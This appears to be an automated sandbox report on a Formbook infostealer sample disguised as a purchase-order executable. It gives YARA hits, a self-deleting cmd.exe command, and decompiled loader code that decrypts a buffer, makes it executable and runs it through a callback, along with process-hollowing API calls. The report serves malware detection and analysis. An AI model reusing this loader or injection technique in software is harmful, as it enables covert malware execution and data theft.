00000003.00000002.498889826.00000000036F0000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.498889826.00000000036F0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.498889826.00000000036F0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 5700 Parent PID: 6984

General

Start time:	09:22:46
Start date:	21/11/2020
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del 'C:\Users\user\Desktop\Purchase Order 40,7045.exe'
Imagebase:	0xbd0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6096 Parent PID: 5700

General

Start time:	09:22:46
Start date:	21/11/2020
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: Purchase Order 40,7045.exe PID: 6916 Parent PID: 5644 Purchase Order 40,7045.exeCOMMON

Executed Functions

Function 00861FA0, Relevance: 29.9, APIs: 4, Strings: 13, Instructions: 132
memorythreadCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E00861FA0(void* __ebx, void* __eflags) {
				char _v6;
				short _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v18;
				char _v20;
				intOrPtr _v24;
				char _v28;
				char _v48;
				char _v64;
				long _v68;
				signed int _v80;
				signed int __esi;
				void* _t40;
				intOrPtr* _t42;
				void* _t43;
				signed int _t55;
				signed char _t57;
				void* _t61;
				signed int _t62;
				void* _t72;
				intOrPtr* _t73;
				void* _t74;
				signed int _t78;
				void* _t83;
				void* _t84;

				_v28 = 0x72657355;
				_v24 = 0x642e3233;
				_v20 = 0x6c6c;
				_v18 = 0;
				_v16 = 0x72637052;
				_v12 = 0x642e3474;
				_v8 = 0x6c6c;
				_v6 = 0;
				_t73 = E00861F10( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18)), 0xb4890485);
				_t40 = E00861F10( *_t73(0xef74b207, _t72, _t74, __ebx),  &_v28);
				_t62 =  &_v20;
				_t61 = _t40;
				_t42 = E00861F10( *_t73(_t62), 0xc1d83a30);
				_t83 = (_t78 & 0xfffffff8) - 0x24 + 0xc;
				_t43 =  *_t42(0, 2, 0, 1, 0,  &_v48); // executed
				if(_t43 != 0 && _t43 == 0x57) {
					_t57 = 0;
					do {
						_t15 = 0x886918 + _t57; // 0x170ce9
						asm("rol cl, 0x2");
						asm("ror cl, 0x2");
						asm("rol cl, 0x2");
						_t62 = (( ~( *_t15) ^ _t57) + 0x00000039 - _t57 ^ 0x00000089) - 0x20;
						 *(0x886918 + _t57) = _t62;
						_t57 = _t57 + 1;
						_t94 = _t57 - 0x1e05;
					} while (_t57 < 0x1e05);
					VirtualProtect(0x886918, 0x1e05, 0x40,  &_v68); // executed
					EnumThreadWindows(0, 0x886918, 0); // executed
				}
				E0086A88D(_t61, _t94, "cls");
				_t84 = _t83 + 4;
				while(1) {
					L6:
					E008672C0(0x8887c8, "\n\n\n\n\n");
					_push("5.Exit");
					_push(_t62);
					_push("4.Buses Available. \n\t\t\t");
					_push(_t62);
					E008672C0(E008672C0(E008672C0(E008672C0(E008672C0(0x8887c8, "\t\t\t1.Install\n\t\t\t"), _t62), "2.Reservation\n\t\t\t"), _t62), "3.Show\n\t\t\t");
					E008672C0(0x8887c8, "\n\t\t\tEnter your choice:-> ");
					_t84 = _t84 + 0x48;
					E00862440( &_v64);
					_t55 = _v68 - 1;
					if(_t55 > 4) {
						continue;
					}
					L7:
					switch( *((intOrPtr*)(_t55 * 4 +  &M00862170))) {
						case 0:
							E008616B0();
							goto L6;
						case 1:
							__eax = E00861810();
							goto L6;
						case 2:
							__eax = E008619C0();
							goto L6;
						case 3:
							__eax = E00861DD0(__ecx);
							while(1) {
								L6:
								E008672C0(0x8887c8, "\n\n\n\n\n");
								_push("5.Exit");
								_push(_t62);
								_push("4.Buses Available. \n\t\t\t");
								_push(_t62);
								E008672C0(E008672C0(E008672C0(E008672C0(E008672C0(0x8887c8, "\t\t\t1.Install\n\t\t\t"), _t62), "2.Reservation\n\t\t\t"), _t62), "3.Show\n\t\t\t");
								E008672C0(0x8887c8, "\n\t\t\tEnter your choice:-> ");
								_t84 = _t84 + 0x48;
								E00862440( &_v64);
								_t55 = _v68 - 1;
								if(_t55 > 4) {
									continue;
								}
								goto L7;
								while(1) {
									L6:
									E008672C0(0x8887c8, "\n\n\n\n\n");
									_push("5.Exit");
									_push(_t62);
									_push("4.Buses Available. \n\t\t\t");
									_push(_t62);
									E008672C0(E008672C0(E008672C0(E008672C0(E008672C0(0x8887c8, "\t\t\t1.Install\n\t\t\t"), _t62), "2.Reservation\n\t\t\t"), _t62), "3.Show\n\t\t\t");
									E008672C0(0x8887c8, "\n\t\t\tEnter your choice:-> ");
									_t84 = _t84 + 0x48;
									E00862440( &_v64);
									_t55 = _v68 - 1;
									if(_t55 > 4) {
										continue;
									}
									goto L7;
									while(1) {
										L6:
										E008672C0(0x8887c8, "\n\n\n\n\n");
										_push("5.Exit");
										_push(_t62);
										_push("4.Buses Available. \n\t\t\t");
										_push(_t62);
										E008672C0(E008672C0(E008672C0(E008672C0(E008672C0(0x8887c8, "\t\t\t1.Install\n\t\t\t"), _t62), "2.Reservation\n\t\t\t"), _t62), "3.Show\n\t\t\t");
										E008672C0(0x8887c8, "\n\t\t\tEnter your choice:-> ");
										_t84 = _t84 + 0x48;
										E00862440( &_v64);
										_t55 = _v68 - 1;
										if(_t55 > 4) {
											continue;
										}
										goto L7;
										do {
											goto L6;
										} while (_t55 > 4);
										goto L7;
									}
								}
							}
						case 4:
							__eax = E0086ACCA(0);
							 *[ds:esi-0x79deb800] =  *[ds:esi-0x79deb800] & __eax;
							 *((intOrPtr*)(__edx + 0x21)) =  *((intOrPtr*)(__edx + 0x21)) + __dl;
							_t24 = __al;
							__al =  *__eax;
							 *__eax = _t24;
							_pop(__esp);
							 *(__esi - 0x79de9a00) =  *(__esi - 0x79de9a00) & __eax;
							__ah = __ah + __cl;
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							_push(__ebp);
							__ebp = __esp;
							__edx = _v80;
							_push(__esi);
							__esi = __ecx;
							__eax = _v80;
							_push(__edi);
							 *((intOrPtr*)(__esi + 0x14)) = 0xf;
							 *(__esi + 0x10) = 0;
							 *__esi = 0;
							__edi = __eax + 1;
							do {
								__cl =  *__eax;
								__eax = __eax + 1;
								__eflags = __cl;
							} while (__cl != 0);
							__eflags = __eax;
							__ecx = __esi;
							__eax = E00863DD0(__esi, __edx, __eax);
							_pop(__edi);
							__eax = __esi;
							_pop(__esi);
							return __esi;
					}
					L6:
					E008672C0(0x8887c8, "\n\n\n\n\n");
					_push("5.Exit");
					_push(_t62);
					_push("4.Buses Available. \n\t\t\t");
					_push(_t62);
					E008672C0(E008672C0(E008672C0(E008672C0(E008672C0(0x8887c8, "\t\t\t1.Install\n\t\t\t"), _t62), "2.Reservation\n\t\t\t"), _t62), "3.Show\n\t\t\t");
					E008672C0(0x8887c8, "\n\t\t\tEnter your choice:-> ");
					_t84 = _t84 + 0x48;
					E00862440( &_v64);
					_t55 = _v68 - 1;
				}
			}

0x00861fac
0x00861fb4
0x00861fbc
0x00861fc3
0x00861fc8
0x00861fd0
0x00861fd8
0x00861fdf
0x00862006
0x00862016
0x0086201e
0x00862023
0x0086202e
0x00862033
0x00862045
0x00862049
0x00862050
0x00862052
0x00862052
0x0086205f
0x00862067
0x0086206d
0x00862070
0x00862073
0x00862079
0x0086207a
0x0086207a
0x00862092
0x008620a1
0x008620a1
0x008620a8
0x008620ad
0x008620b0
0x008620b0
0x008620ba
0x008620c2
0x008620c7
0x008620c8
0x008620cd
0x00862108
0x00862117
0x0086211c
0x00862124
0x0086212d
0x00862131
0x00000000
0x00000000
0x00862137
0x00862137
0x00000000
0x0086213e
0x00000000
0x00000000
0x00862148
0x00000000
0x00000000
0x00862152
0x00000000
0x00000000
0x0086215c
0x008620b0
0x008620b0
0x008620ba
0x008620c2
0x008620c7
0x008620c8
0x008620cd
0x00862108
0x00862117
0x0086211c
0x00862124
0x0086212d
0x00862131
0x00000000
0x00000000
0x00000000
0x008620b0
0x008620b0
0x008620ba
0x008620c2
0x008620c7
0x008620c8
0x008620cd
0x00862108
0x00862117
0x0086211c
0x00862124
0x0086212d
0x00862131
0x00000000
0x00000000
0x00000000
0x008620b0
0x008620b0
0x008620ba
0x008620c2
0x008620c7
0x008620c8
0x008620cd
0x00862108
0x00862117
0x0086211c
0x00862124
0x0086212d
0x00862131
0x00000000
0x00000000
0x00000000
0x008620b0
0x00000000
0x00000000
0x00000000
0x008620b0
0x008620b0
0x008620b0
0x00000000
0x00862168
0x00862170
0x00862177
0x0086217a
0x0086217a
0x0086217a
0x0086217c
0x0086217d
0x00862183
0x00862185
0x00862186
0x00862187
0x00862188
0x00862189
0x0086218a
0x0086218b
0x0086218c
0x0086218d
0x0086218e
0x0086218f
0x00862190
0x00862191
0x00862193
0x00862196
0x00862197
0x00862199
0x0086219b
0x0086219c
0x008621a3
0x008621aa
0x008621ad
0x008621b0
0x008621b0
0x008621b2
0x008621b3
0x008621b3
0x008621b7
0x008621bb
0x008621bd
0x008621c2
0x008621c3
0x008621c5
0x008621c7
0x00000000
0x008620b0
0x008620ba
0x008620c2
0x008620c7
0x008620c8
0x008620cd
0x00862108
0x00862117
0x0086211c
0x00862124
0x0086212d
0x0086212e

APIs

RpcMgmtEpEltInqBegin.RPCRT4(00000000,00000002,00000000,00000001,00000000,?), ref: 00862045
VirtualProtect.KERNELBASE(00886918,00001E05,00000040,?), ref: 00862092
EnumThreadWindows.USER32(00000000,00886918,00000000), ref: 008620A1
__wsystem.LIBCMT ref: 008620A8

Strings

2.Reservation, xrefs: 008620D4
cls, xrefs: 008620A3
Enter your choice:-> , xrefs: 0086210D
, xrefs: 008620B0
User, xrefs: 00861FAC
ll, xrefs: 00861FBC
4.Buses Available. , xrefs: 008620C8
t4.d, xrefs: 00861FD0
3.Show, xrefs: 008620CE
5.Exit, xrefs: 008620C2
ll, xrefs: 00861FD8
1.Install, xrefs: 008620DA
32.d, xrefs: 00861FB4

Memory Dump Source

Source File: 00000000.00000002.238704675.0000000000861000.00000020.00020000.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.238701690.0000000000860000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238716910.000000000087F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238721704.0000000000885000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.238724265.0000000000886000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.238728449.000000000088C000.00000002.00020000.sdmp Download File

Similarity

API ID: BeginEnumMgmtProtectThreadVirtualWindows__wsystem
String ID: 1.Install$Enter your choice:-> $$2.Reservation$3.Show$32.d$4.Buses Available. $5.Exit$User$cls$ll$ll$t4.d
API String ID: 1353417214-2636015041
Opcode ID: f1d6c0319a77171bd246d7dd66cd4bb953f11fe9f9955a955c0a489a0ba3094e
Instruction ID: 35db25a5ce064d074fce1903e74a98988353ac1e95f4cda7d5d21e752f388382
Opcode Fuzzy Hash: f1d6c0319a77171bd246d7dd66cd4bb953f11fe9f9955a955c0a489a0ba3094e
Instruction Fuzzy Hash: 844130B06487006BE210BB688C0BF1B77D4FB54B08F064998F515EB3D3E9B8E60487A7

Uniqueness

Uniqueness Score: -1.00%

Function 00888029, Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 289fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0088825E

Strings

D, xrefs: 00888395
99a6fa8b355441558ce536d5b2c0a4c7, xrefs: 00888348, 0088834B

Memory Dump Source

Source File: 00000000.00000002.238724265.0000000000886000.00000040.00020000.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.238701690.0000000000860000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238704675.0000000000861000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.238716910.000000000087F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238721704.0000000000885000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.238728449.000000000088C000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateFile
String ID: 99a6fa8b355441558ce536d5b2c0a4c7$D
API String ID: 823142352-386092161
Opcode ID: acef11d462dd6987dafb761c8e774b70b54cb11f8792daf6612ac9d837df4d57
Instruction ID: d9b733c8748c6ce8e09a107daadb63a96c76464cc5ddd0bc5dfe3ce1bf89aa16
Opcode Fuzzy Hash: acef11d462dd6987dafb761c8e774b70b54cb11f8792daf6612ac9d837df4d57
Instruction Fuzzy Hash: A8D12330D44388EEEF21DBA8DC45BEDBBB4BF04715F10409AE548FA291D7B50A85DB26

Uniqueness

Uniqueness Score: -1.00%

Function 00866FE0, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 85
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00866FE0(char _a4) {
				char _v8;
				char _v12;
				char _v16;
				char _v28;
				intOrPtr _t27;
				void* _t31;
				intOrPtr _t33;
				intOrPtr _t36;
				void* _t38;
				signed int _t41;
				signed int _t42;
				signed int _t54;
				char _t55;
				void* _t56;

				E008696AD( &_v16, 0);
				_v8 =  *0x88a710;
				if( *0x8888e8 == 0) {
					E008696AD( &_v12, 0);
					if( *0x8888e8 == 0) {
						_t41 =  *0x8888e4; // 0x1
						_t42 = _t41 + 1;
						 *0x8888e4 = _t42;
						 *0x8888e8 = _t42;
					}
					E008696D5( &_v12);
				}
				_t43 = _a4;
				_t54 =  *0x8888e8; // 0x1
				_t27 =  *_a4;
				if(_t54 >=  *((intOrPtr*)(_t27 + 0xc))) {
					L13:
					_t55 = 0;
					goto L6;
				} else {
					_t55 =  *((intOrPtr*)( *((intOrPtr*)(_t27 + 8)) + _t54 * 4));
					if(_t55 == 0) {
						L6:
						if( *((char*)(_t27 + 0x14)) == 0) {
							L9:
							if(_t55 == 0) {
								goto L10;
							}
						} else {
							_t38 = E008692A6();
							if(_t54 >=  *((intOrPtr*)(_t38 + 0xc))) {
								L10:
								_t55 = _v8;
								if(_t55 == 0) {
									_t31 = E008612D0(_t53,  &_v8, _t43); // executed
									_t56 = _t56 + 8;
									if(_t31 != 0xffffffff) {
										_t55 = _v8;
										 *0x88a710 = _t55;
										E008696AD( &_a4, 0);
										_t33 =  *((intOrPtr*)(_t55 + 4));
										__eflags = _t33 - 0xffffffff;
										if(_t33 < 0xffffffff) {
											_t36 = _t33 + 1;
											__eflags = _t36;
											 *((intOrPtr*)(_t55 + 4)) = _t36;
										}
										E008696D5( &_a4);
										E0086922F(__eflags, _t55);
									} else {
										E0086A1E7( &_v28, "bad cast");
										_t27 = E0086BA71( &_v28, 0x88391c);
										goto L13;
									}
								}
							} else {
								_t53 =  *((intOrPtr*)(_t38 + 8));
								_t55 =  *((intOrPtr*)( *((intOrPtr*)(_t38 + 8)) + _t54 * 4));
								goto L9;
							}
						}
					}
				}
				E008696D5( &_v16);
				return _t55;
			}

0x00866fee
0x00866fff
0x00867002
0x00867009
0x00867015
0x00867017
0x0086701c
0x0086701d
0x00867022
0x00867022
0x0086702a
0x0086702a
0x0086702f
0x00867032
0x00867038
0x0086703d
0x0086709b
0x0086709b
0x00000000
0x0086703f
0x00867042
0x00867047
0x0086704d
0x00867051
0x00867063
0x00867065
0x00000000
0x00000000
0x00867053
0x00867053
0x0086705b
0x00867067
0x00867067
0x0086706c
0x00867073
0x00867078
0x0086707e
0x0086709f
0x008670a7
0x008670ad
0x008670b2
0x008670b5
0x008670b8
0x008670ba
0x008670ba
0x008670bb
0x008670bb
0x008670c1
0x008670c7
0x00867080
0x00867088
0x00867096
0x00000000
0x00867096
0x0086707e
0x0086705d
0x0086705d
0x00867060
0x00000000
0x00867060
0x0086705b
0x00867051
0x00867047
0x008670d2
0x008670df

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00866FEE
std::_Lockit::_Lockit.LIBCPMT ref: 00867009
std::bad_exception::bad_exception.LIBCMT ref: 00867088
__CxxThrowException@8.LIBCMT ref: 00867096
std::_Lockit::_Lockit.LIBCPMT ref: 008670AD
std::locale::facet::_Facet_Register.LIBCPMT ref: 008670C7

Strings

bad cast, xrefs: 00867080

Memory Dump Source

Source File: 00000000.00000002.238704675.0000000000861000.00000020.00020000.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.238701690.0000000000860000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238716910.000000000087F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238721704.0000000000885000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.238724265.0000000000886000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.238728449.000000000088C000.00000002.00020000.sdmp Download File

Similarity

API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
String ID: bad cast
API String ID: 2427920155-3145022300
Opcode ID: f6ef0df787d0cf5f4307bc87fec4d564c5ea5fc848812ad3054ce24832b1534d
Instruction ID: 62d1a5f65bdadcfc49e3a1d9d9fe9c6cbaf792be8201e60313678770d32fc1f9
Opcode Fuzzy Hash: f6ef0df787d0cf5f4307bc87fec4d564c5ea5fc848812ad3054ce24832b1534d
Instruction Fuzzy Hash: C4318431904614DBCB24EF68D891B9E77B8FF20724F920155E865E7292DB30AE45CBD3

Uniqueness

Uniqueness Score: -1.00%

Function 00886EBF, Relevance: 10.7, APIs: 7, Instructions: 194filememoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 00886F85
VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,?,?,008879D8,81AF6D4E,0088751B), ref: 00886FAF
ReadFile.KERNELBASE(00000000,00000000,0088751B,?,00000000,?,?,?,?,?,?,?,?,?,008879D8,81AF6D4E), ref: 00886FC6
VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,008879D8,81AF6D4E,0088751B), ref: 00886FE8
FindCloseChangeNotification.KERNELBASE(81AF6D4E,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,008879D8), ref: 0088705A
VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00000000,00000000,00000000,?), ref: 00887065
VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,008879D8,81AF6D4E,0088751B,00000000), ref: 008870B0

Memory Dump Source

Source File: 00000000.00000002.238724265.0000000000886000.00000040.00020000.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.238701690.0000000000860000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238704675.0000000000861000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.238716910.000000000087F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238721704.0000000000885000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.238728449.000000000088C000.00000002.00020000.sdmp Download File

Similarity

API ID: Virtual$AllocFileFree$ChangeCloseCreateFindNotificationRead
String ID:
API String ID: 656311269-0
Opcode ID: 93b28486482b233a9fc0f257d5a4c66314b912bb1555ae1b256415724baca865
Instruction ID: 14fe2ef523eb358e6e0f56990a5f33a8412645dee415d245129ede589b7a9423
Opcode Fuzzy Hash: 93b28486482b233a9fc0f257d5a4c66314b912bb1555ae1b256415724baca865
Instruction Fuzzy Hash: BA519D71E44719ABCB20ABB88C85BAEB7B9FF08710F204455F600F7280E6759D408B65

Uniqueness

Uniqueness Score: -1.00%

Function 008610C0, Relevance: 7.5, APIs: 5, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E008610C0(signed int* __ecx, void* __edi, void* __esi) {
				signed int _t14;
				signed int* _t23;
				signed int* _t29;
				void* _t31;
				void* _t32;

				_t29 = __ecx;
				E00869384(__ecx); // executed
				_t10 = _t29[7];
				_t32 = _t31 + 4;
				if(_t29[7] != 0) {
					E0086A7A3(_t10);
					_t32 = _t32 + 4;
				}
				_t29[7] = 0;
				_t11 = _t29[5];
				if(_t29[5] != 0) {
					E0086A7A3(_t11);
					_t32 = _t32 + 4;
				}
				_t29[5] = 0;
				_t12 = _t29[3];
				if(_t29[3] != 0) {
					E0086A7A3(_t12);
					_t32 = _t32 + 4;
				}
				_t29[3] = 0;
				_t13 = _t29[1];
				if(_t29[1] != 0) {
					E0086A7A3(_t13);
				}
				_t29[1] = 0;
				_t23 = _t29;
				_t14 =  *_t23;
				if(_t14 < 4) {
					return E0086A095(0x888908 + _t14 * 0x18, 0x888908 + _t14 * 0x18);
				}
				return _t14;
			}

0x008610c1
0x008610c5
0x008610ca
0x008610cf
0x008610d4
0x008610d7
0x008610dc
0x008610dc
0x008610df
0x008610e2
0x008610e7
0x008610ea
0x008610ef
0x008610ef
0x008610f2
0x008610f5
0x008610fa
0x008610fd
0x00861102
0x00861102
0x00861105
0x00861108
0x0086110d
0x00861110
0x00861115
0x00861118
0x0086111c
0x008696d5
0x008696da
0x00000000
0x008696ea
0x008696eb

APIs

std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 008610C5

Part of subcall function 00869384: _setlocale.LIBCMT ref: 00869396

_free.LIBCMT ref: 008610D7

Part of subcall function 0086A7A3: HeapFree.KERNEL32(00000000,00000000,?,00870C43,00000000,?,0086EB6E,?,00000001,?,?,0087111D,00000018,00883668,0000000C,008711AD), ref: 0086A7B9
Part of subcall function 0086A7A3: GetLastError.KERNEL32(00000000,?,00870C43,00000000,?,0086EB6E,?,00000001,?,?,0087111D,00000018,00883668,0000000C,008711AD,?), ref: 0086A7CB

_free.LIBCMT ref: 008610EA
_free.LIBCMT ref: 008610FD
_free.LIBCMT ref: 00861110

Memory Dump Source

Source File: 00000000.00000002.238704675.0000000000861000.00000020.00020000.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.238701690.0000000000860000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238716910.000000000087F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238721704.0000000000885000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.238724265.0000000000886000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.238728449.000000000088C000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLastLocinfo::_Locinfo_dtor_setlocalestd::_
String ID:
API String ID: 3515823920-0
Opcode ID: ab7c307895ae33b84b6782c3a79da93e86fc8d08918bf8666afceabfc8388709
Instruction ID: d5f9c3d425e7a5f1899c16a44e86c1619da05d735279797ee21a012e9f19254f
Opcode Fuzzy Hash: ab7c307895ae33b84b6782c3a79da93e86fc8d08918bf8666afceabfc8388709
Instruction Fuzzy Hash: 18F036F1E00A405BDA30DF1D984A81BF2EDFE9171031E892AE586D7601EA71FD048B93

Uniqueness

Uniqueness Score: -1.00%

Function 00886924, Relevance: 6.3, APIs: 4, Instructions: 335threadprocessinjectionCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,08000004,00000000,00000000,?,?), ref: 00886A4E
GetThreadContext.KERNELBASE(?,?), ref: 00886A6D
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00886A8D
SetThreadContext.KERNELBASE(?,00010007,?,?,?,00000004,00000000,?,?,?,?,000000FF,?,00000000,00000000,00000000), ref: 00886C4A

Memory Dump Source

Source File: 00000000.00000002.238724265.0000000000886000.00000040.00020000.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.238701690.0000000000860000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238704675.0000000000861000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.238716910.000000000087F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238721704.0000000000885000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.238728449.000000000088C000.00000002.00020000.sdmp Download File

Similarity

API ID: ContextProcessThread$CreateMemoryRead
String ID:
API String ID: 3262821800-0
Opcode ID: 3eb7ab554e1e5e0187ac4a2d43de8cf8b3ae19ede1c1b5aa68d283930d97de31
Instruction ID: 1d669406d645f80e88e11e8e6f42b9a64ed88fcd91f994dedd58a977633881fb
Opcode Fuzzy Hash: 3eb7ab554e1e5e0187ac4a2d43de8cf8b3ae19ede1c1b5aa68d283930d97de31
Instruction Fuzzy Hash: C8C15871900218EBDF21EFA8CE45BEEBBBAFF04314F148069E544F6190E774AA55CB24

Uniqueness

Uniqueness Score: -1.00%

Function 008720DD, Relevance: 6.0, APIs: 4, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E008720DD() {
				WCHAR* _t2;
				void* _t4;
				void* _t15;
				WCHAR* _t17;

				_t2 = GetEnvironmentStringsW();
				_t17 = _t2;
				if(_t17 != 0) {
					if( *_t17 != 0) {
						goto L3;
						do {
							do {
								L3:
								_t2 =  &(_t2[1]);
							} while ( *_t2 != 0);
							_t2 =  &(_t2[1]);
						} while ( *_t2 != 0);
					}
					_t1 = _t2 - _t17 + 2; // -2
					_t10 = _t1;
					_t4 = E0086EB5D(_t1); // executed
					_t15 = _t4;
					if(_t15 != 0) {
						E0086B710(_t15, _t17, _t10);
					}
					FreeEnvironmentStringsW(_t17);
					return _t15;
				} else {
					return 0;
				}
			}

0x008720e0
0x008720e6
0x008720ec
0x008720f5
0x00000000
0x008720f7
0x008720f7
0x008720f7
0x008720f7
0x008720fa
0x008720ff
0x00872102
0x008720f7
0x0087210a
0x0087210a
0x0087210f
0x00872114
0x00872119
0x0087212b
0x00872130
0x0087211c
0x00872127
0x008720ee
0x008720f1
0x008720f1

APIs

GetEnvironmentStringsW.KERNEL32(00000000,0086AE9A), ref: 008720E0
__malloc_crt.LIBCMT ref: 0087210F
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0087211C

Memory Dump Source

Source File: 00000000.00000002.238704675.0000000000861000.00000020.00020000.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.238701690.0000000000860000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238716910.000000000087F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238721704.0000000000885000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.238724265.0000000000886000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.238728449.000000000088C000.00000002.00020000.sdmp Download File

Similarity

API ID: EnvironmentStrings$Free__malloc_crt
String ID:
API String ID: 237123855-0
Opcode ID: 112992271b95050120921aed677a58d45abbf7508fdd8083b5868c4f5776bcc0
Instruction ID: da8b967fa5de2472f8497ee2f7f462b6af31cbaa88ea15e6af8d821c4d9ec12c
Opcode Fuzzy Hash: 112992271b95050120921aed677a58d45abbf7508fdd8083b5868c4f5776bcc0
Instruction Fuzzy Hash: F1F0827B5045249A8B32A739BC498673769FAD536571B8425F509C3119FA20CD8182B2

Uniqueness

Uniqueness Score: -1.00%

Function 00868AEE, Relevance: 3.0, APIs: 2, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00868AEE(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4, char _a8) {
				void* __esi;
				void* __ebp;
				char _t11;
				void* _t21;

				_t22 = __eflags;
				_t21 = __ecx;
				E00868286(__ebx, __ecx, __edx, __eflags);
				 *(__ecx + 0x3c) =  *(__ecx + 0x3c) & 0x00000000;
				_push(0x20);
				_t17 = __ecx;
				 *((intOrPtr*)(__ecx + 0x38)) = _a4;
				_t11 = E008689F3(__ebx, __ecx, __edi, __ecx, _t22); // executed
				 *((char*)(_t21 + 0x40)) = _t11;
				if( *((intOrPtr*)(_t21 + 0x38)) == 0) {
					_t17 = _t21;
					_t11 = E008614E0(_t21,  *(_t21 + 0xc) | 0x00000004, 0);
				}
				if(_a8 != 0) {
					return E00869F32(_t17, _t21);
				}
				return _t11;
			}

0x00868aee
0x00868af4
0x00868af6
0x00868afe
0x00868b02
0x00868b04
0x00868b06
0x00868b09
0x00868b12
0x00868b15
0x00868b20
0x00868b22
0x00868b22
0x00868b2b
0x00000000
0x00868b33
0x00868b36

APIs

std::ios_base::_Init.LIBCPMT ref: 00868AF6

Part of subcall function 00868286: std::locale::locale.LIBCPMT ref: 008682C9

Part of subcall function 008689F3: __EH_prolog3.LIBCMT ref: 008689FA

std::ios_base::_Addstd.LIBCPMT ref: 00868B2E

Part of subcall function 008614E0: __CxxThrowException@8.LIBCMT ref: 00861509
Part of subcall function 008614E0: std::exception::exception.LIBCMT ref: 00861530
Part of subcall function 008614E0: __CxxThrowException@8.LIBCMT ref: 0086154F
Part of subcall function 008614E0: std::exception::exception.LIBCMT ref: 00861571
